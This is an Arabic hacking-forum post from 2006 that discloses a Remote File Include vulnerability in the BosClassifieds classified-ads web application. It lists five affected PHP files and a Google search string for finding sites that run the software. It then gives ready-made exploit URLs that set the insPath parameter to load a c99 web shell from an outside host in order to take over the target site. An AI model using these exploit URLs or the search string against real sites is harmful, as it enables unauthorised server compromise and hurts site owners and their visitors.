ثغره Remote File Include في نظام الاعلانات BosClassifieds

XP · 07-08-2006, 01:22 AM

سلاااام عليكم

تطبيق الويب BosClassifieds Classified Ads System
عبارة عن نظام إعلاني يركب في المواقع لإعطاء الزوار والعملاء
امكانية الاعلان عن المنتجات و الوظائف الشاغره وغيرها تحت اقسام متنوعه
تم اكتشاف ثغرات امنية متعددة في التطبيق وهي من نوع الادراج عن بعد
يمكن من خلالها تنفيذ اي تطبيق شيل لإختراق المواقع.

اكتشاف: MazaGi

ملفات المصابه:
index.php
recent.php
account.php
classified.php
search.php
في كثير سكربتات مصابه بس انا حطيت اهمها

للبحث في قوقل:

كود PHP:


			
Powered by BosClassifieds Classified Ads System

الاستغلال:

كود PHP:


			
http://www.site.com/[path]/index.php?insPath=http://www.powow.com/rem/c99shell.txt?

http://www.site.com/[path]/recent.php?insPath=http://www.powow.com/rem/c99shell.txt?

http://www.site.com/[path]/account.php?insPath=http://www.powow.com/rem/c99shell.txt?

http://www.site.com/[path]/classified.php?insPath=http://www.powow.com/rem/c99shell.txt?

http://www.site.com/[path]/search.php?insPath=http://www.powow.com/rem/c99shell.txt?